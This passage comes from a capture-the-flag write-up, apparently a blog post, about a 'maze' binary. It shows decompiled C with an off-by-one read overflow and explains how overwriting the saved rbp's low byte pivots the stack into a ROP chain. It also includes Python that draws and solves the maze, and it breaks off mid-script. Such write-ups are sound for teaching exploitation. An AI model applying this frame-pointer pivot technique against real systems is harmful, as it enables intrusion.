\u00a0\u00a0<\/span>ssize_t <\/span>nread<\/span>;<\/span> \/\/ rbx@1<\/span><\/div>\n
\u00a0\u00a0<\/span>FILE *<\/span>_rax<\/span>;<\/span> \/\/ rax@2<\/span><\/div>\n
\u00a0\u00a0<\/span>FILE *<\/span>fp<\/span>;<\/span> \/\/ r13@2<\/span><\/div>\n
\u00a0\u00a0<\/span>int<\/span> n<\/span>;<\/span> \/\/ eax@3<\/span><\/div>\n
\u00a0\u00a0<\/span>char<\/span> buf<\/span>[<\/span>1056<\/span>]<\/span>;<\/span> \/\/ [sp+0h] [bp-420h]@1<\/span><\/div>\n
<\/div>\n
\u00a0\u00a0<\/span>__printf_chk<\/span>(<\/span>1LL<\/span>,<\/span> “If you want, you can also add your name: “<\/span>)<\/span>;<\/span><\/div>\n
\u00a0\u00a0<\/span>memset<\/span>(<\/span>buf<\/span>,<\/span> 0<\/span>,<\/span> 1016uLL<\/span>)<\/span>;<\/span><\/div>\n
\u00a0\u00a0<\/span>buf<\/span>[<\/span>0<\/span>]<\/span> =<\/span> ‘\\n’<\/span>;<\/span><\/div>\n
\u00a0\u00a0<\/span>buf<\/span>[<\/span>1016<\/span>]<\/span> =<\/span> 0<\/span>;<\/span><\/div>\n
\u00a0\u00a0<\/span>nread<\/span> =<\/span> read<\/span>(<\/span>0<\/span>,<\/span> &<\/span>buf<\/span>[<\/span>1<\/span>]<\/span>,<\/span> 1056uLL<\/span>)<\/span>;<\/span><\/div>\n
\u00a0\u00a0<\/span>if<\/span> (<\/span> nread<\/span> ><\/span> 0<\/span> )<\/span><\/div>\n
\u00a0\u00a0<\/span>{<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0<\/span>_rax<\/span> =<\/span> fopen<\/span>(<\/span>“highscore.txt”<\/span>,<\/span> “a”<\/span>)<\/span>;<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0<\/span>fp<\/span> =<\/span> _rax<\/span>;<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0<\/span>if<\/span> (<\/span> _rax<\/span> )<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0<\/span>{<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/span>fwrite<\/span>(<\/span>buf<\/span>,<\/span> 1uLL<\/span>,<\/span> nread<\/span> +<\/span> 1<\/span>,<\/span> _rax<\/span>)<\/span>;<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/span>n<\/span> =<\/span> __sprintf_chk<\/span>(<\/span>buf<\/span>,<\/span> 1LL<\/span>,<\/span> 1017LL<\/span>,<\/span> ” (%d)”<\/span>,<\/span> num_moves<\/span>)<\/span>;<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/span>if<\/span> (<\/span> n<\/span> ><\/span> 0<\/span> )<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/span>{<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/span>fwrite<\/span>(<\/span>buf<\/span>,<\/span> 1uLL<\/span>,<\/span> n<\/span>,<\/span> fp<\/span>)<\/span>;<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/span>fclose<\/span>(<\/span>fp<\/span>)<\/span>;<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/span>}<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0<\/span>}<\/span><\/div>\n
\u00a0\u00a0<\/span>}<\/span><\/div>\n
}<\/span><\/div>\n
<\/div>\n
\/\/—– (0000000000400DD0) —————————————————-<\/span><\/div>\n
void<\/span> __fastcall <\/span>reached_goal<\/span>(<\/span>unsigned<\/span> int<\/span> num_moves<\/span>)<\/span><\/div>\n
{<\/span><\/div>\n
\u00a0\u00a0<\/span>FILE *<\/span>fp<\/span>;<\/span> \/\/ r12@1<\/span><\/div>\n
\u00a0\u00a0<\/span>__int64 <\/span>offset<\/span>;<\/span> \/\/ rbx@2<\/span><\/div>\n
\u00a0\u00a0<\/span>int<\/span> i<\/span>;<\/span> \/\/ er13@2<\/span><\/div>\n
\u00a0\u00a0<\/span>int<\/span> len<\/span>;<\/span> \/\/ er14@8<\/span><\/div>\n
\u00a0\u00a0<\/span>void<\/span> *<\/span>ptr<\/span>;<\/span> \/\/ rsp@13<\/span><\/div>\n
\u00a0\u00a0<\/span>char<\/span> chr<\/span>;<\/span> \/\/ [sp+0h] [bp-40h]@3<\/span><\/div>\n
\u00a0\u00a0<\/span>unsigned<\/span> __int8 <\/span>last_name<\/span>;<\/span> \/\/ [sp+Fh] [bp-31h]@13<\/span><\/div>\n
<\/div>\n
\u00a0\u00a0<\/span>puts<\/span>(<\/span>“You can see the sun!\\nFinally, you are free!”<\/span>)<\/span>;<\/span><\/div>\n
\u00a0\u00a0<\/span>fp<\/span> =<\/span> fopen<\/span>(<\/span>“highscore.txt”<\/span>,<\/span> “r”<\/span>)<\/span>;<\/span><\/div>\n
\u00a0\u00a0<\/span>if<\/span> (<\/span> fp<\/span> )<\/span><\/div>\n
\u00a0\u00a0<\/span>{<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0<\/span>offset<\/span> =<\/span> –<\/span>1LL<\/span>;<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0<\/span>for<\/span> (<\/span> i<\/span> =<\/span> 0<\/span>;<\/span> ;<\/span> ++<\/span>i<\/span> )<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0<\/span>{<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/span>len<\/span> =<\/span> i<\/span> +<\/span> 1<\/span>;<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/span>if<\/span> (<\/span> fseek<\/span>(<\/span>fp<\/span>,<\/span> offset<\/span>,<\/span> 2<\/span>)<\/span> )<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/span>break<\/span>;<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/span>if<\/span> (<\/span> fread<\/span>(<\/span>&<\/span>chr<\/span>,<\/span> 1uLL<\/span>,<\/span> 1uLL<\/span>,<\/span> fp<\/span>)<\/span> !=<\/span> 1<\/span> )<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/span>break<\/span>;<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/span>if<\/span> (<\/span> !<\/span>chr<\/span> )<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/span>break<\/span>;<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/span>if<\/span> (<\/span> chr<\/span> ==<\/span> ‘\\n’<\/span> )<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/span>break<\/span>;<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/span>—<\/span>offset<\/span>;<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/span>if<\/span> (<\/span> chr<\/span> ==<\/span> ‘\\r’<\/span> )<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/span>break<\/span>;<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0<\/span>}<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0<\/span>if<\/span> (<\/span> !<\/span>fseek<\/span>(<\/span>fp<\/span>,<\/span> –<\/span>i<\/span>,<\/span> 2<\/span>)<\/span> )<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0<\/span>{<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/span>\/\/ allocating a temporary buffer on the stack<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/span>ptr<\/span> =<\/span> alloca<\/span>(<\/span>len<\/span> +<\/span> 15LL<\/span>)<\/span>;<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/span>\/\/ hexrays is not able to show this correctly \ud83d\ude1b<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/span>\/\/ it uses the buffer that is allocated on the stack,<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/span>\/\/ and aligns it to a 16-byte boundary.<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/span>memset<\/span>(<\/span>(<\/span>void<\/span> *<\/span>)<\/span>(<\/span>(<\/span>unsigned<\/span> __int64<\/span>)<\/span>&<\/span>last_name<\/span> &<\/span> 0xFFFFFFFFFFFFFFF0LL<\/span>)<\/span>,<\/span> 0<\/span>,<\/span> len<\/span>)<\/span>;<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/span>if<\/span> (<\/span> fread<\/span>(<\/span>(<\/span>void<\/span> *<\/span>)<\/span>(<\/span>(<\/span>unsigned<\/span> __int64<\/span>)<\/span>&<\/span>last_name<\/span> &<\/span> 0xFFFFFFFFFFFFFFF0LL<\/span>)<\/span>,<\/span> 1uLL<\/span>,<\/span> i<\/span>,<\/span> fp<\/span>)<\/span> )<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/span>{<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/span>__printf_chk<\/span>(<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/span>1LL<\/span>,<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/span>“On the wall behind you, you see a long list of names, the last one is: %s\\n”<\/span>,<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/span>(<\/span>unsigned<\/span> __int64<\/span>)<\/span>&<\/span>last_name<\/span> &<\/span> 0xFFFFFFFFFFFFFFF0LL<\/span>)<\/span>;<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/span>fclose<\/span>(<\/span>fp<\/span>)<\/span>;<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/span>goto<\/span> do_append<\/span>;<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/span>}<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0<\/span>}<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0<\/span>fclose<\/span>(<\/span>fp<\/span>)<\/span>;<\/span><\/div>\n
\u00a0\u00a0<\/span>}<\/span><\/div>\n
\u00a0\u00a0<\/span>puts<\/span>(<\/span>“On the wall behind you, you see a list of something, probably names.”<\/span>)<\/span>;<\/span><\/div>\n
do_append<\/span>:<\/span><\/div>\n
\u00a0\u00a0<\/span>append_highscore<\/span>(<\/span>num_moves<\/span>)<\/span>;<\/span><\/div>\n
}<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/div>\n<\/div>\n

If you did not find the vulnerability this time either, you need to practice more. \ud83d\ude09 In the original code, it was easy to overlook (although still quite visible, when taking the stack\/frame pointer offsets in the automatically produced comments into account). In the revised code, the vulnerability is rather obvious though. Note how the decompiled code in the append_highscore() function (originally, sub_400CE0) has changed:<\/p>\n

Before:<\/p>\n

\n
<\/div>\n
\n\n\n\n
\n
\n
1<\/div>\n
2<\/div>\n
3<\/div>\n
4<\/div>\n
5<\/div>\n
6<\/div>\n
7<\/div>\n
8<\/div>\n
9<\/div>\n<\/div>\n<\/td>\n
\n
\n
\u00a0\u00a0<\/span>char<\/span> ptr<\/span>;<\/span> \/\/ [sp+0h] [bp-420h]@1<\/span><\/div>\n
\u00a0\u00a0<\/span>_BYTE <\/span>v6<\/span>[<\/span>7<\/span>]<\/span>;<\/span> \/\/ [sp+1h] [bp-41Fh]@1<\/span><\/div>\n
\u00a0\u00a0<\/span>char<\/span> v7<\/span>;<\/span> \/\/ [sp+3F8h] [bp-28h]@1<\/span><\/div>\n
<\/div>\n
\u00a0\u00a0<\/span>__printf_chk<\/span>(<\/span>1LL<\/span>,<\/span> “If you want, you can also add your name: “<\/span>)<\/span>;<\/span><\/div>\n
\u00a0\u00a0<\/span>memset<\/span>(<\/span>&<\/span>ptr<\/span>,<\/span> 0<\/span>,<\/span> 0x3F8uLL<\/span>)<\/span>;<\/span><\/div>\n
\u00a0\u00a0<\/span>ptr<\/span> =<\/span> 10<\/span>;<\/span><\/div>\n
\u00a0\u00a0<\/span>v7<\/span> =<\/span> 0<\/span>;<\/span><\/div>\n
\u00a0\u00a0<\/span>v1<\/span> =<\/span> read<\/span>(<\/span>0<\/span>,<\/span> v6<\/span>,<\/span> 0x420uLL<\/span>)<\/span>;<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/div>\n<\/div>\n

After:<\/p>\n

\n
<\/div>\n
\n\n\n\n
\n
\n
1<\/div>\n
2<\/div>\n
3<\/div>\n
4<\/div>\n
5<\/div>\n
6<\/div>\n
7<\/div>\n<\/div>\n<\/td>\n
\n
\n
\u00a0\u00a0<\/span>char<\/span> buf<\/span>[<\/span>1056<\/span>]<\/span>;<\/span> \/\/ [sp+0h] [bp-420h]@1<\/span><\/div>\n
<\/div>\n
\u00a0\u00a0<\/span>__printf_chk<\/span>(<\/span>1LL<\/span>,<\/span> “If you want, you can also add your name: “<\/span>)<\/span>;<\/span><\/div>\n
\u00a0\u00a0<\/span>memset<\/span>(<\/span>buf<\/span>,<\/span> 0<\/span>,<\/span> 1016uLL<\/span>)<\/span>;<\/span><\/div>\n
\u00a0\u00a0<\/span>buf<\/span>[<\/span>0<\/span>]<\/span> =<\/span> ‘\\n’<\/span>;<\/span><\/div>\n
\u00a0\u00a0<\/span>buf<\/span>[<\/span>1016<\/span>]<\/span> =<\/span> 0<\/span>;<\/span><\/div>\n
\u00a0\u00a0<\/span>nread<\/span> =<\/span> read<\/span>(<\/span>0<\/span>,<\/span> &<\/span>buf<\/span>[<\/span>1<\/span>]<\/span>,<\/span> 1056uLL<\/span>)<\/span>;<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/div>\n<\/div>\n

As you can see, 1056 bytes is read into a 1056 byte buffer, but, it begins reading at offset 1. This means that we are able to overflow the buffer with one byte. While this is obviously a rather contrived example, off-by-one vulnerabilities are often found in the wild as well. Typical cases include people doing things like buf[sizeof(buf)] = X, or allocating room for strings without taking the terminating NUL-byte into account.<\/p>\n

So, what can we accomplish with a 1-byte-overflow? Well, that obviously depends on what is stored right after the buffer in question, and if our target is running on a little-endian or a big-endian architecture. For little-endian architectures, including x86 and x86_64, the least significant byte (LSB) of a value, including pointers, is stored first. So, if we are overwriting the LSB of an address that is originally 0xbadc0ded, it is the \u2018ed\u2019 at the end of the address that will be overwritten, and not the \u2018ba\u2019 in the beginning of it. To make this clearer, here is an illustration of how the 32-bit value 0xbadc0ded is stored in memory (each hex-character represents 4 bits, so one byte is represented by two hex characters):<\/p>\n

\"badc0ded-lsb\"<\/a><\/p>\n

Overwriting the LSB of an address will thus shift it slightly, with up to 255 bytes depending on what the original value was. If the original value is 0x123456, overwriting the LSB with 00 will change it to 0x123400, effectively subtracting 0x56 from the original value. So, what is stored right after our buffer in this case? Well, the automatically produced comment for our buf-variable will reveal that right away. \u201c[bp-420h]\u201d means that the buffer is located at rbp (the current base\/frame pointer value) minus 0x420 (and 0x420 = 1056). Note that rbp points to the location of the saved rbp value, that will be restored when returning from the function. Our 1-byte-overflow will overwrite the least-significant-byte of the saved rbp value, which means that we will be able to control (part of) rbp after append_highscore() has returned back into reached_goal().<\/p>\n

Regarding frame pointers, note that they are actually forming a linked list. The current frame pointer value (rbp) points to the saved frame pointer value in the current function\u2019s stack frame, and the saved frame pointer value points to the saved frame pointer of the calling function\u2019s stack frame, and so on. Below you can see how the stack frames for each function in maze are linked together, at the time when append_highscore() is executed. Since the stack grows down, towards lower addresses, the \u2018buf\u2019 buffer in append_highscore()\u2019s stack frame is stored at a lower address than all the saved frame pointer values.<\/p>\n

\"maze<\/a><\/p>\n

This description is a bit simplified though, since each function, including append_highscore(), saves a few other registers as well. While this is not apparent when looking in Hex-Rays, when looking at the actual assembly code in IDA we can see that the stack space that is being reserved for the buffer on the stack is actually 0x408 = 1032 bytes, and since this probably includes some extra padding added by gcc, the original size of the buffer in the source code was probably less than this. Most likely it was declared to be 1016 bytes, and the buf[1016] = \u2018\\0\u2019 was actually buf[sizeof(buf)] = \u2018\\0\u2019 in the original source code, and since the contents of the rbx register is pushed to the stack right before the stack space for buf is reserved, this actually means that the LSB of the saved rbx register is being overwritten with a NUL-byte regardless of if we are exploiting the overflow with read() or not.<\/p>\n

\"function<\/a><\/p>\n

When returning from append_highscore(), back into reached_goal(), the saved contents of the rbx, r12 and r13 registers are restored from the stack, as well as the saved frame pointer (rbp). In this case, reached_goal() is not using any of those registers before returning into main(), but if it did, that could have potentially resulted in other exploitable scenarios as well. Even though it did not matter in this particular case, always aim to have a complete understanding of everything that is going on, since there will be times when paying attention to those small details are crucial to success.<\/p>\n

If reached_goal() would have referenced any local stack variables after append_highscore() returned, and if the assembly code produced to reference those variables used the base\/frame pointer, that could have resulted in potentially exploitable side-effects for us as well. In cases such as this, when the function that was calling the vulnerable function is returning to a function one step further up the call-chain, an even more convenient opportunity arises though. For code that is compiled to use frame pointers, the function epilogue usually ends with \u201cleave; ret\u201d, or equivalently, \u201cmov rsp, rbp; pop rbp; ret\u201d. As you can see, this sets rsp = rbp (i.e, if we controlled the contents of rbp, we now control the stack pointer), pops the new rbp value, and finally returns (i.e. pops the return address, using the stack pointer that is now under our control). Looking at the code, we can see that it uses a variation of this, that sets rsp = rbp-0x28, restores 5 registers (5*8=40=0x28) and then pops rbp and returns.<\/p>\n

\"function<\/a><\/p>\n

So, by exploiting the 1-byte-overflow of a stack buffer in append_highscore(), we will actually be able to control the stack pointer when returning from the reached_goal() function. In other words, we have control over where the return address is about to be retrieved. Pointing rsp into a buffer that we control the contents of will thus allow us to control the return address. Ideally, we want to point rsp into a buffer containing a full ROP chain to exploit the program in question. If we would have known the address of the system() function, and if the RDI register (that is used for storing the first function argument, in the standard x86_64 ABI) had contained the address of a buffer that we control the contents of, the full ROP chain in question would have only consisted of a return into system(). \ud83d\ude42 Always keep in mind all the parameters that are under your control (i.e register values, buffer contents, and so on), and information you currently have (base addresses of libraries, the executable, stack\/heap addresses, and so on), and what information you can potentially deduce. Sometimes there are case-specific shortcuts you can take in order to achieve reliable exploitation of a particular target.<\/p>\n

As I mentioned earlier, overwriting the least-significant-byte of the saved rbp value will allow us to shift it to an address slightly further up or down the stack, with up to a maximum of 255 bytes (up to 248 bytes in this case, since the saved rbp value will obviously be aligned to an 8-byte-boundary). Shifting it to a higher address will not do us any good, since we do not control the contents of any stack buffers allocated there. Shifting it to a lower address can potentially point it into the \u2018buf\u2019 buffer though, depending on what the LSB of the original saved rbp value is. By overflowing with a NUL-byte, we ensure that we are effectively subtracting as much as possible from the saved rbp value, and maximize our chances of pointing rbp into our buffer.<\/p>\n

Due to ASLR, the LSB of the saved rbp value will vary (and sometimes, the LSB will even be 0 to begin with), so it is possible that we need to make a few attempts in order to exploit this. When ASLR is enabled, the base address (and once again, keep in mind that the stack grows down towards lower addresses) of the stack will be randomized, and unlike the randomization of base addresses for dynamically loaded libraries, and PIE-binaries, the offset within the memory page will be randomized as well. For libraries\/PIE-binaries, the 12 least significant bits will always remain the same, and can be used to narrow down the potential binary versions that are running on a system that you are exploiting in cases where you have found an information leak.<\/p>\n

We now know where the vulnerability is, and have a rough idea of how to exploit it (i.e, overflow the LSB of the saved rbp with a NUL-byte, hoping that it is enough to point it into our buffer, where we will store a ROP chain). This was the easy part. \ud83d\ude09 To actually trigger the vulnerability, it turns out that we have to solve the maze. Since the maze is fairly large (179\u00d795), we obviously don\u2019t want to go through the process of solving the maze manually on each exploitation attempt (as I mentioned, the exploit will not work every time due to ASLR). Since the maze is static and hardcoded into the binary, we can just solve it manually and send the solution after connecting though.<\/p>\n

Initially, I decided to make a small python script in order to visualize the maze. By analyzing the, slightly hairy, algorithm of the check_valid_moves_loop, we can deduce that maze_map[] is actually an array containing the x- and y-coordinates of all the occupied squares (the walls) in the maze. Even if we would not have been able to deduce this by looking at the code alone, it could have been deduced by analyzing the data in the array in question. Especially when visualizing it. \ud83d\ude42<\/p>\n

I made this script to extract the maze data from the binary, and create a PNG file:<\/p>\n

\n
<\/div>\n
\n\n\n\n
\n
\n
1<\/div>\n
2<\/div>\n
3<\/div>\n
4<\/div>\n
5<\/div>\n
6<\/div>\n
7<\/div>\n
8<\/div>\n
9<\/div>\n
10<\/div>\n
11<\/div>\n
12<\/div>\n
13<\/div>\n
14<\/div>\n
15<\/div>\n
16<\/div>\n
17<\/div>\n
18<\/div>\n
19<\/div>\n
20<\/div>\n
21<\/div>\n
22<\/div>\n
23<\/div>\n
24<\/div>\n
25<\/div>\n
26<\/div>\n
27<\/div>\n
28<\/div>\n
29<\/div>\n
30<\/div>\n
31<\/div>\n
32<\/div>\n
33<\/div>\n
34<\/div>\n
35<\/div>\n
36<\/div>\n
37<\/div>\n
38<\/div>\n
39<\/div>\n
40<\/div>\n
41<\/div>\n<\/div>\n<\/td>\n
\n
\n
#!\/usr\/bin\/env python<\/span><\/div>\n
<\/div>\n
import <\/span>Image<\/span><\/div>\n
import <\/span>sys<\/span><\/div>\n
<\/div>\n
maze_path<\/span> =<\/span> “.\/maze”<\/span><\/div>\n
maze_offs<\/span> =<\/span> 0x13e0<\/span><\/div>\n
maze_size<\/span> =<\/span> 17276<\/span><\/div>\n
<\/div>\n
def <\/span>err<\/span>(<\/span>s<\/span>)<\/span>:<\/span> sys<\/span>.<\/span>stderr<\/span>.<\/span>write<\/span>(<\/span>“[-] %s\\n”<\/span> %<\/span> s<\/span>)<\/span><\/div>\n
def <\/span>die<\/span>(<\/span>s<\/span>)<\/span>:<\/span> err<\/span>(<\/span>s<\/span>)<\/span>,<\/span> sys<\/span>.<\/span>exit<\/span>(<\/span>1<\/span>)<\/span><\/div>\n
<\/div>\n
try<\/span>:<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0<\/span>with <\/span>open<\/span>(<\/span>maze_path<\/span>)<\/span> as<\/span> f<\/span>:<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/span>f<\/span>.<\/span>seek<\/span>(<\/span>maze_offs<\/span>)<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/span>buf<\/span> =<\/span> f<\/span>.<\/span>read<\/span>(<\/span>maze_size<\/span>)<\/span><\/div>\n
except<\/span>:<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0<\/span>die<\/span>(<\/span>“Could not extract maze data from binary”<\/span>)<\/span><\/div>\n
<\/div>\n
arr<\/span> =<\/span> [<\/span>]<\/span><\/div>\n
<\/div>\n
max_x<\/span> =<\/span> 0<\/span><\/div>\n
max_y<\/span> =<\/span> 0<\/span><\/div>\n
<\/div>\n
for<\/span> a<\/span>,<\/span>b<\/span> in<\/span> zip<\/span>(<\/span>*<\/span>[<\/span>iter<\/span>(<\/span>buf<\/span>)<\/span>]<\/span>*<\/span>2<\/span>)<\/span>:<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0<\/span>x<\/span>,<\/span> y<\/span> =<\/span> ord<\/span>(<\/span>a<\/span>)<\/span>,<\/span> ord<\/span>(<\/span>b<\/span>)<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0<\/span>if<\/span> x<\/span> ><\/span> max_x<\/span>:<\/span> max_x<\/span> =<\/span> x<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0<\/span>if<\/span> y<\/span> ><\/span> max_y<\/span>:<\/span> max_y<\/span> =<\/span> y<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0<\/span>arr<\/span>.<\/span>append<\/span>(<\/span>(<\/span>x<\/span>,<\/span>y<\/span>)<\/span>)<\/span><\/div>\n
<\/div>\n
w<\/span> =<\/span> max_x<\/span>+<\/span>1<\/span><\/div>\n
h<\/span> =<\/span> max_y<\/span>+<\/span>1<\/span><\/div>\n
<\/div>\n
im<\/span> =<\/span> Image<\/span>.<\/span>new<\/span>(<\/span>‘RGB’<\/span>,<\/span> (<\/span>w<\/span>,<\/span> h<\/span>)<\/span>,<\/span> (<\/span>255<\/span>,<\/span>255<\/span>,<\/span>255<\/span>)<\/span>)<\/span><\/div>\n
<\/div>\n
for<\/span> pos <\/span>in<\/span> arr<\/span>:<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0<\/span>im<\/span>.<\/span>putpixel<\/span>(<\/span>pos<\/span>,<\/span> (<\/span>0<\/span>,<\/span> 0<\/span>,<\/span> 0<\/span>)<\/span>)<\/span><\/div>\n
<\/div>\n
im<\/span>.<\/span>resize<\/span>(<\/span>(<\/span>w*<\/span>4<\/span>,<\/span> h*<\/span>4<\/span>)<\/span>)<\/span>.<\/span>save<\/span>(<\/span>‘maze.png’<\/span>)<\/span><\/div>\n
<\/div>\n
sys<\/span>.<\/span>exit<\/span>(<\/span>0<\/span>)<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/div>\n<\/div>\n

This is the resulting PNG file:
\n\"maze\"<\/a><\/p>\n

I then wrote a simple recursive algorithm in order to solve the maze:<\/p>\n

\n
<\/div>\n
\n\n\n\n
\n
\n
1<\/div>\n
2<\/div>\n
3<\/div>\n
4<\/div>\n
5<\/div>\n
6<\/div>\n
7<\/div>\n
8<\/div>\n
9<\/div>\n
10<\/div>\n
11<\/div>\n
12<\/div>\n
13<\/div>\n
14<\/div>\n
15<\/div>\n
16<\/div>\n
17<\/div>\n
18<\/div>\n
19<\/div>\n
20<\/div>\n
21<\/div>\n
22<\/div>\n
23<\/div>\n
24<\/div>\n
25<\/div>\n
26<\/div>\n
27<\/div>\n
28<\/div>\n
29<\/div>\n
30<\/div>\n
31<\/div>\n
32<\/div>\n
33<\/div>\n
34<\/div>\n
35<\/div>\n
36<\/div>\n
37<\/div>\n
38<\/div>\n
39<\/div>\n
40<\/div>\n
41<\/div>\n
42<\/div>\n
43<\/div>\n
44<\/div>\n
45<\/div>\n
46<\/div>\n
47<\/div>\n
48<\/div>\n
49<\/div>\n
50<\/div>\n<\/div>\n<\/td>\n
\n
\n
NONE<\/span> =<\/span> 0<\/span> # Not visited yet<\/span><\/div>\n
WALL<\/span> =<\/span> 1<\/span> # This position contains a wall<\/span><\/div>\n
GOAL<\/span> =<\/span> 2<\/span> # This is the position we are searching for<\/span><\/div>\n
DONE<\/span> =<\/span> 3<\/span> # Used to mark positions that have already been visited<\/span><\/div>\n
<\/div>\n
# Simple recursive algorithm to solve the maze. Does not find an optimal<\/span><\/div>\n
# path, but good enough. Does not include sub-paths leading to dead ends,<\/span><\/div>\n
# that are backtracked during the search.<\/span><\/div>\n
def <\/span>find_path<\/span>(<\/span>x<\/span>,<\/span> y<\/span>)<\/span>:<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0<\/span># Yeah… Ugly, but gets the job done. \ud83d\ude1b<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0<\/span>global<\/span> path<\/span>,<\/span> maze<\/span>,<\/span> max_x<\/span>,<\/span> max_y<\/span><\/div>\n
<\/div>\n
\u00a0\u00a0\u00a0\u00a0<\/span>if<\/span> maze<\/span>[<\/span>x<\/span>]<\/span>[<\/span>y<\/span>]<\/span> ==<\/span> GOAL<\/span>:<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/span># The path is created in reverse, while backtracking<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/span>path<\/span> =<\/span> [<\/span>(<\/span>x<\/span>,<\/span>y<\/span>)<\/span>]<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/span>return<\/span> True<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0<\/span>elif <\/span>maze<\/span>[<\/span>x<\/span>]<\/span>[<\/span>y<\/span>]<\/span> ==<\/span> WALL <\/span>or<\/span> maze<\/span>[<\/span>x<\/span>]<\/span>[<\/span>y<\/span>]<\/span> ==<\/span> DONE<\/span>:<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/span>return<\/span> False<\/span><\/div>\n
<\/div>\n
\u00a0\u00a0\u00a0\u00a0<\/span>maze<\/span>[<\/span>x<\/span>]<\/span>[<\/span>y<\/span>]<\/span> =<\/span> DONE<\/span><\/div>\n
<\/div>\n
\u00a0\u00a0\u00a0\u00a0<\/span>if<\/span> (<\/span>(<\/span>x<\/span> <<\/span> max_x <\/span>and<\/span> find_path<\/span>(<\/span>x<\/span>+<\/span>1<\/span>,<\/span> y<\/span>)<\/span>)<\/span><\/div>\n
